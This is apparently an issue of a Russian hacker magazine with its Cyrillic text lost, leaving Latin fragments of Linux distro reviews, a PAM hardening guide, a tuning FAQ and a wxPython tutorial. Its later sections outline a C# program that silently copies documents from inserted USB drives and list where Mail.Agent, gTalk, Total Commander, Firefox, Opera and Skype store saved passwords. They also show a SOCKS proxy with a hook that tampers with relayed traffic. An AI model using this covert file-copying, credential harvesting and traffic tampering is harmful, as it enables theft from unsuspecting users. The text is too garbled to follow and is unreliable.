Canon Cat. GUI,
, LEAP- ,
-, ..
- ,
, GUI ,
- ,
, .
, , ,
.
, ,
, THE - , ZUI Zooming
User Interface.
, ,
,
,
, 100%.
,
- .
, ,
.
,
1- 2005 ,
THE Archy. Archy
RCHI,
( )
(Raskin Center for Humane Interfaces).
,
.
, ,
26- 2005 .
,
,
.
Humanized Inc., Mozilla,
. , ,
?
,
. ,
GUI,
,
,
,
.
, ,
, ,
. z
069
>> unixoid
MOBLIN V2
UX (USER
EXPERIENCE)
BETA
LINUX MINT 7
GLORIA
FEDORA 11
LEONIDAS
CALCULATE
LINUX
DESKTOP 9.6
XFCE
BOBER
/ ZLOY.BOBR@GMAIL.COM /
Linux- - 2009
>> unixoid
GNU/Linux- , , - . , , z
.
FEDORA 11 LEONIDAS
: Fedora 11
: fedoraproject.org
: 9 2009
: GPL
: i586, x86_64, PPC,
PPC64, s390, s390x
070
, 9 18:00
FTP-
, ,
.
X 08 /128/ 09
>> unixoid
. : Desktop
Edition, LiveCD- GNOME KDE
( i686 x64 )
. 1
DVD 6 CD ( cd1). ,
. Desktop Edition
,
;
.
.
, 2008
Wikipedia
RHEL/Fedora Ubuntu, ,
: -
2 + 1
. , Fedora
6-8 ,
. LTS-, Ubuntu,
. . ,
Fedora,
DVD- (
docs.fedoraproject.org
ch-upgrade-x86.
html). ,
(
), Fedora 9
10, 11.
.
Fedora .
gcc 4.4, .
MinGW
Windows (
mingw32-*).
xt4.
xt4
Fedora 9, , ,
.
ext2/3. 48- ,
,
,
. , ext4
,
.
, ext4 . (Delayed
allocation), - 60
X 08 /128/ 09
MINTINSTALL
, , .
.
2.6.30 ,
. /
boot ext2/3; ext4
.
.
, ,
(, ).
, .
Presto. diff-,
.
60-80% . ,
yum install
yum-presto. , RPM
4.7.
, .
PackageKit , ,
.
, .
, , MIME. , GNOME.
KDE mp3-
, (JuK),
.
:
# rpm -Uhv http://download1.
rpmfusion.org/free/fedora/
rpmfusion-free-release-rawhide.
noarch.rpm http://download1.
rpmfusion.org/nonfree/fedora/
rpmfusion-nonfree-releaserawhide.noarch.rpm
# yum install gstreamer-pluginsbad gstreamer-plugins-ugly
,
20 .
, Bluetooth.
,
.
, ,
. , ,
:
# yum grouplist //
071
>> unixoid
Calculate Linux Desktop 9.7 KDE.
: Kernel 2.6.28.10, KDE 4.2.4, X.Org 7.4, OpenOffice 3.0.1.
:
;
;
2.5 KDE;
USB Flash DVD HDD.
2 Flash;
LiveDVD .
2 .
calculate --update :
# layman -S && emerge calculate
INFO
info
Intel
Moblin Linux
Foundation.
Moblin :
Acer, HP, ASUS, MSI
.
Anaconda . , ,
. ,
Setup Agent.
LiveUSB Creator, .
, , KPackageKit
. yum update
61 .
,
KDE .
GNOME .
CALCULATE
CALCULATE
FEDORA LINUX
HTTP://WWW
links
DistroWatch
(distrowatch.com)
,
,
Linux,
/
OpenSolaris
xBSD.
072
X 08 /128/ 09
>> unixoid
MOBLIN
Linux Mint. , ,
Ubuntu +
( ) , 3- distrowatch.
com, openSUSE.
Mint 2006 ;
Clement Lefebvre.
Linux,
. Mint : , ,
,
. ,
- ,
.
APT- . ( , 1 ) .mint-,
, .
Software Portal . , Ubuntu.
5,
. Mint , Mint 1 Ada.
Linux Mint 7 Ubuntu 9.04 Jaunty Jackalope
LiveCD/DVD ,
. x86- (
64- ,
). GNOME.
Mint , ,
7 .
:
Main Edition LiveCD-, , ;
Universal Edition LiveDVD (1,3 ), X 08 /128/ 09
, .
, Main,
, .
. , Main
Edition, .
Live-
. . ,
.
Windows, . Computer.
mintDesktop, Compiz.
mintMenu KDE4.
; ,
Fedora 11 Spins
(fedoraproject.org/wiki/Releases/11/Spins),
: XFce ( ), Games,
Fedora Electronic Lab, Educations (
, ) AOS
(Appliance Operating System),
. OEM- . , .
Russian Fedora Remix 11 (www.
russianfedora.ru) Fedora . ;
, .
073
>> unixoid
Filter. , .
, . ,
. ,
Gnome Do.
,
: , , , ,
, , .
/etc/apt/source.list ,
Medibuntu.
Synaptic mintInstall, , .
.
. More Info
FEDORA
. Visit, .
Featured applications , .
Mint Gufw,
( ), Advanced. , mintNanny.
, /etc/hosts
0.0.0.0.
;
.
, Synaptic, russian
. GNOME
language-pack-gnome-ru.
calculate-linux.ru, -).
HDD USB-HDD ext4, ext3, ext2, ReiserFS, JFS XFS. FTP/
HTTP LiveCD. Torrent LiveDVD.
FTP
, . KDE
CLD, XFCE CLD. .
:
( - );
( 2
);
Memtest.
( ), , .
( XFCE-);
. DHCP- ,
Wicd.
Live- guest/guest.
root su.
LZMA-
, . OpenOffice.org 3.0.1, StarDict, Firefox 3.0.10
( Flash-), ClawsMail, Pidgin, XChat, GIMP 2.6.6, Audacious,
Mplayer gnome-mplayer. , .
, <Caps Lock>.
calculate. ,
, :
# calculate --update
(www.calculate-linux.ru/_) , ,
:
# alculate --disk=/dev/sda2
root.
ReiserFS,
GRUB MBR. . Calculate
, > 45 ( ), : alculate --disk=/dev/sda.
.
Gentoo emerge.
:
ISO - /usr/calculate/share/linux
calculate. ,
.
074
X 08 /128/ 09
>> unixoid
LINUX MINT
, , , Moblin
x86- AMD Geode VIA Nano/C7.
: Acer Aspire One, Asus eeePC 901, 1000H, Dell Mini
9, MSI Wind, Lenovo S10, Samsung NC10, HP Mini 1010 1120NR.
.
, ,
,
.
Moblin Fedora (
, 9). - ,
Clutter (clutter-project.org), OpenGL OpenGL ES
( , www.khronos.org/opengles).
Clutter OpenedHand,
Intel. , Clutter
GLX- X.org,
Android, Moblin Linux. , .
img- 700 ,
USB- CD.
dd.
image-writer (git.moblin.org/cgit.cgi/
moblin-image-creator/plain/image-writer).
Live- (netboot).
XFCE, . , X 08 /128/ 09
.
, - .
, .
.
. (
) Favourite Applications.
m_zone ,
Twitter Last.fm.
, .
(, ). ,
, .
Bickley (moblin.org/projects/bickley)
.
Moblin -,
Mozilla Gecko, , IM- Empathy (
Jabber, Gtalk, ICQ, MSN, IRC, Salut)
. Moblin Image Creator 2
(MIC2), Moblin.
,
. , , . ,
, , . z
075
>> unixoid
/ ZOBNIN@GMAIL.COM /
PAM
>> unixoid
PAM
UNIX. , .
,
USB-, chroot-
-.
FEDORA 11 LEONIDAS
PAM
PAM (Pluggable
Authentication Modules)
( PAM , z
2006 , ..) , ,
.
, ,
/ .
076
/bin/login, .
PAM /etc/passwd .
PAM,
/bin/login
. ,
PAM
,
(
!)
( chroot -
!)
.
PAM ,
/ .
/etc/pam.d. /etc/pam.d/
login, /bin/login:
# vi /etc/pam.d/login
auth
sufficient pam_self.so
no_warn
auth
include
system
X 08 /128/ 09
>> unixoid
PAM_ABL
account requisite
so
account required
account include
session include
password include
pam_securetty.
pam_nologin.so
system
system
system
PAM
,
, PAM-,
.
:
auth , ;
account , ,
;
session (,
);
password ,
( /usr/
bin/passwd).
, ,
()
. , (
,
/etc/security).
include,
( ).
system ( /etc/pam).
FreeBSD; Linux- Debian Ubuntu
common-*
(common-auth, common-session ..), Gentoo
Mandriva system-*.
PAM,
/etc/passwd :
auth required pam_unix.so no_warn
try_first_pass nullok
, ,
.
X 08 /128/ 09
. ,
, , (
, ). , , /etc/pam.d/
su, auth :
# vi /etc/pam.d/su
auth
sufficient pam_rootok.so
no_warn
auth
sufficient pam_self.so no_
warn
auth
requisite pam_group.
so no_warn group=wheel root_only
fail_safe
auth
include
system
pam_rootok, UID , , ,
.
( sufficient).
( root), pam_self,
, UID UID ,
.
,
( : vasya
su vasya, ,
su , ). pam_group
wheel, , ,
( requisite).
,
auth /etc/pam.d/system (
pam_unix, ).
.
, su ?
auth sufficient pam_deny.so.
pam_deny false.
, su
, root.
pam_permit, .
/etc/pam.d/su auth sufficient
pam_permit.so, su ,
, .
,
.
USB-
Linux-PAM
OpenPAM
,
auth. , ,
pam_guest,
, pam_ftpusers,
/etc/ftpusers, pam_securetty,
,
secure /etc/ttys ( /etc/securetty Linux).
,
.
,
USB-,
- . , , pam_usb.
USB-
. ,
. ?
.
FreeBSD pam_usb ,
Linux ( Debian/
Ubuntu). pam_usb
:
# apt-get install libpam-usb
pamusb-tools
USB- pamusbconf, :
# pamusb-conf --add-device _
,
, ,
077
>> unixoid
PAM
PAM Sun Microsystems, 1995 . PAM Solaris 2.3,
UNIX- , Linux,
FreeBSD, NetBSD Mac OS X. API PAM
XSSO. PAM :
, Solaris;
Linux-PAM, Linux;
OpenPAM, BSD-.
INFO
, . , y.
,
USB-:
# pamusb-conf --add-user root
info
Linux-PAM
Red Hat,
RedHat
3.0.4 (1996 ).
FreeBSD
OpenPAM
.
LinuxPAM.
, y
:
# pamusb-check root
pam_usb .
pam_usb auth .
PAM, , /etc/pam.d/
PAM
SSHD
common-auth.
, pam_unix.so,
auth sufficient pam_usb.so. ,
PAM
common-auth, , USB-,
.
.
fprint (www.reactivated.
net/fprint/wiki/Main_Page),
( USB-)
. ,
pam_fprint.
libfprint pam_fprint
Ubuntu Fedora
FreeBSD (/usr/ports/security/pam_fprint). ,
OPENPAM
PAM /etc/
pam.d
/etc/
pam.conf.
HTTP://WWW
links
PAM
: www.
xakep.ru/magazine/
xa/086/112/1.asp.
078
X 08 /128/ 09
>> unixoid
PAM
.
:
$ pam_fprint_enroll --enroll-finger 6
6 .
fprint ,
, 1 , 8
.
. pam_fprint auth
. /etc/
pam.d/common-auth ( /etc/pam.d/system FreeBSD)
auth sufficient pam_fprint.
so. required
sufficient,
( ;
).
,
PAM -
, , . X 08 /128/ 09
:
PAM-,
.
, , pam_listfile (
Linux-PAM). .
PAM-
/etc/users.allow:
auth sufficient pam_listfile.so item=user
sense=allow file=/etc/users.allow onerr=fail
,
:
WARNING
info
OpenBSD PAM .
PAM
Kerberos.
079
>> unixoid
PAM FREEBSD
account (,
, ,
, ). ssh .
account: account required
pam_access.so /etc/security/access.conf
:
# vi /etc/security/access.conf
+ : ALL : 192.168.1
+ : good_guy : ALL
- : ALL : ALL
, ssh
192.168.1.0 good_guy. .
pam_lockout (ostatic.com/pam-lockout).
PAM: auth requisite pam_lockout.so user=bad_guy.
pam_alredyloggedin (ilya-evseev.
narod.ru/posix/pam_alreadyloggedin).
,
( , ,
<Alt+Fx>).
auth (
):
auth required /lib/security/pam_securetty.so
auth sufficient /lib/security/pam_alreadyloggedin.so
no_root
080
,
pam_pwdfile (cpbotha.net/software/pam_pwdfile).
,
/etc/passwd. , .
: FTP- vsftpd. , . : pam_pwdfile,
vsftpd.
/etc/pam.d/vsftpd:
auth required pam_pwdfile.so pwdfile /usr/local/etc/
vsftpd/vsftpd.users
account required pam_pwdfile.so pwdfile /usr/local/
etc/vsftpd/vsftpd.users
chpwdfile
(eclipse.che.uct.ac.za/chpwdfile) : :MD5--.
pam_abl (hexten.net/
pam_abl),
-.
UNIX . ,
,
. /etc/pam.d/sshd
auth required pam_abl.so config=/etc/
security/pam_abl.conf. . , , X 08 /128/ 09
>> unixoid
,
.
- . /etc/security/pam_abl.conf
:
# vi /etc/security/pam_abl.conf
//
host_db=/var/lib/abl/hosts.db
//
host_purge=2d
// 10
1
host_rule=*:10/1h
,
, CHROOT
, PAM- session
, . ,
.
pam_limits
Linux-PAM ( OpenPAM).
/etc/
security/limits.conf.
, pam_chroot (sourceforge.net/
projects/pam-chroot),
. ,
shell-, ftp- -
, . .
:
# echo 'session required pam_chroot.so' >> /etc/pam.d/
ssh
# echo 'vasya /usr/chroot' >> /etc/security/chroot.
conf
pam_winbind,
AD, pam_ldap, , LDAP.
Linux pam_namespace.
(/tmp, )
. , /tmp
X 08 /128/ 09
.
, (race
condition), .
/etc/security/
namespace.conf ,
. /tmp:
# mkdir /tmp-inst
# chmod 0 /tmp-inst
# echo "/tmp /tmp-inst/ user root" >> /etc/security/
namespace.conf
# echo "session required pam_namespace.so" >> /etc/
pam.d/common-session
: /tmp ,
root ( /tmp-inst/).
/home (
) :
$HOME $HOME/$USER.inst/ user root
PAM- password ,
. ,
.
pam_cracklib
:
;
, ;
, (UnixOid, UnIxOiD);
- ( : unixoid,
: dioxinu);
, .
, pam_
cracklib /etc/pam.d/passwd, passwd.
:
password required pam_cracklib.so retry=3 minlen=8
dcredit=-2 ucredit=-1 ocredit=-1 lcredit=0
password required pam_unix.so use_authtok
: 6 , ,
(, ).
PAM ,
,
.
,
,
PAM, ( ).
www.
kernel.org/pub/linux/libs/pam/modules.html.
PAM,
Linux-PAM. z
081
>> unixoid
-
MegaFAQ Linux
>> unixoid
Linux- ,
512 ASUS EeePC.
, ,
Firefox
.
Linux, 16 i486? , ,
,
, .
Q.
Linux . .
- ?
A. , , .
, /etc/init.d/rc
:
082
for i in /etc/rc$runlevel.d/S*
do
case "$runlevel" in
*) startup $i start ;;
esac
done
*) startup $i start ;;
*) startup $i start & ;;.
:
,
.
. , Linux , X 08 /128/ 09
>> unixoid
,
.
:
# echo "20" > /proc/sys/vm/
swappiness
/etc/sysctl.conf:
vm.swappiness = 20
.
,
, ( ),
,
:
INIT-NG
.
.
. ,
4 : A, B, C D, C ,
, , 15-20, D
, C. , C , D ,
C. , D .
. ? : cinit,
, . , cinit
D, C, D, .
cinit
: nico.schottelius.org/documentations/
speeches/metarheinmain-chaosdays-110b/
cinit/view.
InitNG (Init Next Generation).
z _03_2006).
, upstart,
, ~10 .
Q. ?
A.
(drakxservices Mandriva, systemconfig-services Fedora, services-admin
Ubuntu),
rcN.d-
(
, -
).
X 08 /128/ 09
Q. ?
A. free .
(
) ?
, ,
-, , .
.
( 512 ):
# dd if=/dev/zero of=/swap/sw-file
bs=1k count=524288
# mkswap /swap/sw-file 524288
# swapon /swap/sw-file
, (
swapon -a).
Q. ?
A. ,
20 30. ,
. ,
.
,
, OpenOffice,
GIMP,
, 70, , 80 85.
vm.pagecache = 90
vm.dirty_ratio = 50
Q.
?
A.
. hdparm,
. ,
:
$ hdparm /dev/sda
$ hdparm -i /dev/sda
,
:
MaxMultSect/MultSect /
,
(
);
PIO modes/DMA modes ,
(, , );
multcount ;
I/O support
(16- , 32- 32 );
using_dma DMA ;
readahead .
(
) /etc/hdparm.conf /etc/
default/hdparm ( ).
hdparm -tT /dev/sda.
DMA (-d1), 32-
083
>> unixoid
/
,
Linux /
(I/O scheduler) . I/O scheduler , /sys/
block/sda/queue/scheduler:
# cat /sys/block/sda/queue/scheduler
noop anticipatory deadline [cfq]
SYSTEM-CONFIG-SERVICES
-W (0/1), /
. -
FREE
084
X 08 /128/ 09
>> unixoid
.
Q. ?
A. nice,
, ionice
. Ubuntu ionice
schedutils.
:
ionice -c -n -p PID
0 7 ( ,
). :
1. Real time ,
(8
[0-7]);
2. Best Effort ,
(8
);
3. Idle ,
; .
PID :
$ sudo ionice -c2 -n0 mplayer
Q. ?
A. .
,
, . , , ext3,
Linux-.
, :
.
, ,
.
,
,
. :
#1. ,
/.
#2. /usr, .
#3. /home,
.
#4. /tmp, .
#5. /var, .
,
(
)? : .
ext2 (
X 08 /128/ 09
DRAKXSERVICES
) noatime ( ).
/tmp,
, atime .
/var ,
ReiserFS, /home ,
.
, /tmp
tmpfs,
. ,
, .
/etc/fstab:
tmpfs /tmp tmpfs size=512m,mode=1777
00
: ,
ext4.
, ,
, , ext4
,
.
Q. ?
A.
,
X.org. ATI nVidia,
- 2D- (
), .
nv,
KDE 4.1.1.
UT, 166
( ),
1 , 2.6-
.
XFCE. ?
, nv,
2D- ( 2D) .
, nvclock (www.linuxhardware.org/
nvclock), , .
nVidia 5900FX. -
Far Cry ( wine).
,
nvclock -f -n 540, 400 540,
.
3D-
. , (
, 3D- ),
.
Q. Compiz?
A. . , Ubuntu
.
:
# gtk-window-decorator --replace
( GNOME)
# kde-window-decorator --replace
085
>> unixoid
UBUNTU
( KDE)
Q. -
?
A. , . ATI nVidia,
, ,
GPU. Khronos Group,
OpenCL (www.khronos.
org/opencl), GPU . ,
,
.
. Linux
Memory Technology
086
Device (MTD),
,
, PCI. , en.gentoo-wiki.com/
wiki/TIP_Use_memory_on_video_card_as_swap,
()
,
.
,
, /tmp. :
,
VGA-.
Q. - , .
?
A. Linux
IPv6.
IP , . , ipv6,
/etc/modprobe.conf,
, /etc/modprobe.d/
blacklist.local blacklist ipv6.
, / TCP window
scaling,
TCP-,
,
.
:
# sysctl -w net.ipv4.tcp_window_
scaling=0
X 08 /128/ 09
>> unixoid
,
/etc/sysctl.conf:
net.ipv4.tcp_window_scaling=0
TCP window
scaling,
TCP- :
net.ipv4.tcp_rmem = 4096 87380
174760
net.ipv4.tcp_wmem = 4096 87380
174760
UDP:
net.ipv4.udp_rmem_min = 16384
net.ipv4.udp_wmem_min = 16384
net.ipv4.udp_mem = 8388608 12582912
16777216
Linux 2.6
,
:
net.ipv4.tcp_no_metrics_save = 1
net.ipv4.tcp_moderate_rcvbuf = 1
net.core.netdev_max_backlog = 2500
,
: sysctl -a | grep tcp.
.
txqueuelen
ifconfig:
# ifconfig eth0 txqueuelen 1000
2.6.7, reno
( ).
, :
# sysctl net.ipv4.tcp_available_
congestion_control
,
.
6 : reno, cubic, bic, htcp, vegas westwood.
,
cubic htcp,
. ,
,
westwood.
:
sysctl -w net.ipv4.tcp_congestion_
control=htcp
Q.
?
A.
X 08 /128/ 09
cron,
,
/etc/cron.hourly
(), /etc/cron.daily (), /etc/
cron.weekly () /etc/cron.monthly
().
,
,
.
/etc/cron.hourly (
).
Q.
?
A. , !
mcompress, :
#!/bin/sh
VER=' uname -r`
MAJ='uname -r | awk -F. '{print $1}'`
MIN='uname -r | awk -F. '{print $2}'`
if [ $MAJ -ge 2 -a $MIN -ge 5 ]; then
OBJ=ko
else
OBJ=o
fi
find /lib/modules/'uname -r'/ -name
*.$OBJ -exec gzip -9 '{}'';'
depmod -a; depmod -A
Q.
?
A. . :
xsane, sane-utils, libsane, foomatic-db-hpijs,
hpijs, hplip
HP ( HP, ,
,
);
w3m ( , ?
);
bogofilter, bogofilter-{bdb,common} ;
splix Samsung
SPL2 ( Lexmark, SPL2
);
gucharmap ;
onboard ;
rss-glx .
. .
,
. , ttf-arabeyes,
ttf-lao, ttf-arphic-uming, ttf-sazamani*, ttf-indic*,
ttf-unfonts-core, ttf-thai* .
80 .
.
.
. OpenOffice GIMP?
, ,
.
, , .
,
README, CHANGES, GPL, LICENSE, AUTHORS,
ChangeLog .. , !
.
/usr/share/doc , .
,
- ,
,
.
250 .
Q.
?
A. ,
.
.
.
,
3-5%,
Gentoo Stage1
:
O2
.
fomit-frame-pointer
.
funroll-loops .
mcpu=_ .
march=_ +
.
pipe
( ).
-mcpu -march
: gcc.gnu.org/onlinedocs/gcc/i386and-x86_002d64-Options.html.
.
, totem,
amarok, k3b, firefox, thunderbird
. wmii, ion3 awesome,
mc , links2, dillo
elinks web, mutt
, snownews RSS, sonata
+ mpd , mplayer .
,
.
.
.
,
screen/tmux. z
087
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
GUI PYTHON!
/SHPAK.VADIM@GMAIL.COM/
, .
. GUI
Python.
GUI PYTHONE
GUI. Python . GUI
. -, ,
Python. -, GUI-.
GUI-: Tkinter Tcl/Tk, wxPython
wxWidgets, PyQt Qt ( , ). Tkinter
Python, GUI .
wxPython. GUI-
wxWindows.
IDE
IDE, GUI. , , ,
. , wxPython BoaConstructor. GUI:
, ,
( ). IDE ,
.
.
wxPython .
HELLO, WORLD!
:
GUI GUI! ,
Hello, world! wxPythone.
++++
import wx
++++
++++
++++
class HelloFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, id=-1, parent=None,
pos=wx.Point(422, 270), size=
wx.Size(300, 200), title=Hello Frame)
self.panel = wx.Panel(self)
self.helloButton = wx.Button(id=-1, label=
Push me.,parent=self.panel,
088
, Hello, world!.
?
. wxPython-
: .
,
, . :
1) app = wx.PySimpleApp() ,
wx.App . ,
wxPython.
2) OnInit() .
. False, .
3) frame = HelloFrame() (
wx.Frame ). , , OnInit()
,
! ( ), .
( SetTopWindow()) ( , ).
X 08 /128/ 09
>> coding
():
wx.Frame(parent, id=-1, title=,
pos=wx.DefaultPosition, size=wx.DefaultSize,
X 08 /128/ 09
style=wx.DEFAULT_FRAME_STYLE, name=frame)
,
. .
id, .
id.
:
1)
.
2) wx.NewId().
3) wx.ID_ANY -1 (
).
-
089
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
, .
: self.panel.Bind(wx.EVT_BUTTON, self.OnButtonClick, self.
helloButton).
panel , , helloButton, OnButtonClick(self,
event).
, , ,
, ( ).
helloButton,
OnButtonClick() Frame, .
:
Skip(),
(
, ).
.
. , , ,
.
wx.Panel , , ,
, .
,
.
. .
, . ,
( pos size).
Get/Set (
, C++,
wxPython wxWindows,
C++).
,
, .
(events) wxPythone , .
MainLoop(), .
, ,
. .
- , ,
, . wx.Event
. , wx.MouseEvent 14 ,
wx.EVT_RIGHT_DOWN, wx.EVT_LEFT_UP ..
wxPython,
. ,
wx.Button wx.CommandEvent
EVT_BUTTON. ,
, ,
.
, , ,
,
wx.PyEventBinder. .
,
.
wx.EvtHandler, ,
Bind. - ,
. : Bind(event, handler,
source=None, id=wx.ID_ANY, id2=wx.ID_ANY).
. Event wx.PyEventBinder, ; handler , ,
.
source , (
, , ).
090
, , , Hello,
world!, . .
GUI .
GUI:
1. .
2. .
3. GUI .
( Windows).
270 . ,
.
, .
,
/ , ,
. GUI,
.
, GUI.
.
, .
1. ,
,
(, buttonMul
button_12).
2. .
On. ,
, , (,
OnButtonEraseClick , ,
buttonErase). ,
, ,
.
3.
.
,
(
), .
, , , ,
labele . :
# ,
# panel.
children = self.panel.GetChildren()
# , .
for child in children:
if child.GetId() == event.GetId():
X 08 /128/ 09
>> coding
HTTP://WWW
links
http://www.python.
org/doc/faq/gui
Pythons GUI FAQ.
http://www.
wxpython.org
wxPython.
wiki.python.org/moin
GuiProgramming
IDE
.
# , ,
# labele .
self.textCtrlInfo.AppendText(child.
GetLabel())
. Pythona,
. ,
(=)
(
OnOperationClick). ,
,
Pythone. -
, (, 2+3,
2+3=5 ).
, ,
GUI.
, .
1. ,
(,
).
,
.
. , style
wx.DEFAULT_FRAME_STYLE & (~(wx.MAXIMIZE_BOX |
wx.RESIZE_BORDER).
2.
, , .
.
:
X 08 /128/ 09
try:
number = float(self.textCtrlInfo.GetValue())
except (TypeError, ValueError):
self.errorStatusBar.SetStatusText(
'! .')
return
http://boaconstructor.
sourceforge.net
IDE
GUI.
http://www.pdfsearch-engine.com/
wxpython-in-actionpdf.html
WxPython in action.
float; , , ,
errorStatusBar .
, (TypeError,
ValueError). errorStatusBar.
, .
3. ,
. ,
: textCtrlInfo.
SetMaxLength(30).
, wxPython .
wxPython. ,
. wxPython
wxPython
Demo, .
.
. WxPython in
action Noel Rappin Robin Dunn.
.
, ,
( 1,2,3,11,14). wxPython .
GUI
Pythone, . ! z
DVD
dvd
.
wxPython.
091
++++
>> coding
++++
++++
++++
++++
/ ANTONOV.IGOR.KHV@GMAIL.COM /
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
-
// ( ) . ,
.
,
.
.
,
- , .
,
.
, :
.
, .
C#.
.NET
.
. , ,
.
. , ,
.
ProgressBar. .
092
- .
,
,
. ,
.
,
.
,
.
.
, . ,
MSND. ,
. !
WINAPI ...
(
)
WM_DEVICECHANGE. ,
X 08 /128/ 09
>> coding
?
. $10 $100.
, . ,
, . ,
;).
.
WindowProc. :
,
LResult CALLBACK WindowProc (
HWND hwnd, //
UINT uMsg, //
WPARAM wParam, //,
LPARAM lParam // -
XDIRECTORY
SOURCE
DESTINATION
.
.
OVERWRITE
. TRUE,
FOLDERFILTER
FILEFILTERS
X 08 /128/ 09
LAUNCH-
)
WParam ,
WM_DEVICECHANGE. :
- DBT_DEVICEARRIVAL
- DBT_DEVICEREMOVECOMPLETE
, ,
, , ?
( usb)
(, , ..). ,
. LParam
_DEV_BROADCAST_HDR,
dbch_devicetype. , ,
. DEV_DEVTYP_
VOLUME,
!
typedef struct _DEV_BROADCAST_HDR {
DWORD dbch_size; //
DWORD dbch_devicetype; //
DWORD dbch_reserved; //,
}DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;
093
++++
>> coding
++++
++++
++++
++++
++++
++++
flashcopier.ItemCopied +=
new ItemCopiedEventHandler(ItemCopied);
++++
++++
flashcopier.CopyComplete +=
new CopyCompleteEventHandler(CopyComplete);
flashcopier.Source =
new DirectoryInfo(e.Drive.ToString());
flashcopier.Destination =
new DirectoryInfo(dirName);
++++
flashcopier.Overwrite = true;
flashcopier.FolderFilter = "*";
++++
++++
flashcopier.FileFilters.Add("*.doc");
flashcopier.FileFilters.Add("*.xls");
//
//....
flashcopier.StartCopy();
STARTCOPY
CANCELCOPY
XDIRECTORY
API, . . ;
. , .NET C#
.
.NET
C#.
? . WinAPI,
? ?.
- . WinAPI- ( ),
.
. C#,
.
( ) .
. ,
,
Windows API.
, , , Jan Dolinay.
DriveDetector, :
-;
;
;
;
;
,
.
, .
. :
++++
flashDriveDetector = new DriveDetector();
++++
++ ++
++++
++++
++++
++++
, , . , ,
DEV_BROADCAST_
VOLUME.
typedef struct _DEV_BROADCAST_VOLUME {
DWORD dbcv_size; //
DWORD dbcv_devicetype; //
DWORD dbcv_reserved; //
DWORD dbcv_unitmask; //
WORD dbcv_flags; //
}
DEV_BROADCAST_VOLUME, *PDEV_BROADCAST_VOLUME;
dbcv_unitmask. ,
,
. , 0, A;
1, B ..
.
094
flashDriveDetector.DeviceArrived +=
new DriveDetectorEventHandler(OnDriveArrived);
flashDriveDetector.DeviceRemoved +=
new DriveDetectorEventHandler(OnDriveRemoved);
DriveDetector
DevieArrived() DriveRemoved().
, .
Form1().
DeviceArrived. .
,
.
flash_ ,
, .
,
CreateDirectory().
.
DirectoryInfo, ,
X 08 /128/ 09
>> coding
Create(),
.
.
xDirectory.
, ,
: .
, xDirectory . -
.
, . ,
.
. , . ,
. XXI ,
xDirectory
.
, // ,
.
. ( ) usb-
, .
USB-
. . -. .
,
.
/ ,
.
, . , launch-.
, , , portable- ,
, .
.
X 08 /128/ 09
XDIRECTORY
ITEMINDEXEDEVENTHANDLER
INDEXCOMPLEATEEVENT
HANDLER
ITEMCOPIEDEVENTHANDLER
COPYCOMPLETEEVENTHANDLER
, .
.
?
, - .
Documents and Settings\\
Application Data\%ProgramName% .
ProgramName .
,
xDirectory (
) .
. ( ),
.NET (
TC):
RegistryKey readKey = Registry.CurrentUser.
OpenSubKey("software\\Ghisler\\Total
Commander");
string key =
(string) readKey.GetValue("InstallDir");
. .
, .
,
,
.
WARNING
warning
.
?
!
DVD
dvd
.
MAIL.AGENT
Mail.ru
( ). , ,
:
095
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
, . ,
, . ( )
-. ,
.
1. . MA
Documents and setting\%%\Appication Data\Mra\base.
base mra.dbs. , ,
.
2. -.
MRA\% %\clist5.txt. ,
mail.agent (
). , @.
3. . (, )
HKCU\Software\Mail.RU\Agent\
magent_logins2\%Account% ####password.
GTALK
++++
++++
++++
Google ,
gabber- gTalk. gTalk
. ,
, ,
.
gTalk HHEY_
CURRENT_USER\Software\Google\Google Talk\Accounts.
, -
gTalk.
pw.
TOTAL COMMANDER
++++
++++
++ ++
++++
++++
++++
++++
Total Commander ,
.
(
). FTP-. , , ,
.
TC ,
ini-. ,
(ip, ,
..) Total Commander wcx_ftp.ini,
. ,
Total Commander, .
HKEY_CURRENT_USER\Software\Ghisler\Total Commander.
FIREFOX
WEB, ,
. web-. 99% .
/ ,
.
-
096
MSDN
. , ,
.
, . , , .
1. sessionstore.js .
2. signons3.txt ( FF).
3. signons.sqlite SQLite-,
.
4. key3.db , .
Document
and Settings\%UserName%\Application Data\Mozilla\FireFox\
Profiles\% %.
OPERA
Opera , . , .
, Opera , FireFox.
Document and
Settings\%UserName%\Application Data\Opera\profile wand.
dat. , Opera
, FireFox.
SKYPE
.
,
. , ,
( , FF).
Document and Settings\%userName%\Application Data\Skype\
HKEY_CURRENT_USER\Software\
Skype\ProtectedStorage.
QIP
, QIP Application Data\qip.
COPYING COMPLETED
.NET ,
. , ,
, WinAPI ASMe. - ,
, WinAPI , ,
. ,
. ,
, , .z
X 08 /128/ 09
2100 . ( 15%
)
. ,
!
!
+ + DVD:
- 155 ( 25% , )
12
3720
2100
+DVD 6
1200 .
, ,
8(495)780-88-29 ( )
8(800)200-3-999 ( , , ). info@glc.ru
www.GLC.ru
1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
:
;
20
.
,
.
, . ,
, .
!
C 2009
72 000 QIWI ()
.
++++
>> coding
++++
++++
PREDIDENTUA
/ HTTP://TUTAMC.COM /
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
-
socks- Pythone
socks- ,
IP.
: , ,
.
1.
Google Chrome
. ,
. , .
! socks-,
Chromea. . ,
http- ( , user-agent) ,
. ,
, , . ,
.
2.
++++
++++
++++
FOA Group.
socks-, POST- ,
, AES
BASE64. , , . : [FOA]secure text[/FOA], socks- -
[FOA]BASE64==[/FOA]. html-
098
. -
base64-, ,
- .
3.
, - . ( ,
). ,
.
,
. -, Simp,
socks-,
RSA-. -, :).
. , Python.
SOCKS-
Socks .
, , -.
X 08 /128/ 09
>> coding
SOCKS
IP- , socks-.
PySocks.py . ,
,
Windows7? , PySocks py pyw.
. ,
recv. PySocks.
py ,
( ):
data = readable_sock.recv(self.server)
if data:
if readable_sock == client_sock:
my_type = 1
else:
my_type = 2
data = my_hack.my_hack(my_type,data)
X 08 /128/ 09
OSCAR. !
writeableslist[0].send(data)
if readable_sock == client_sock:
octets_out += len(data)
else:
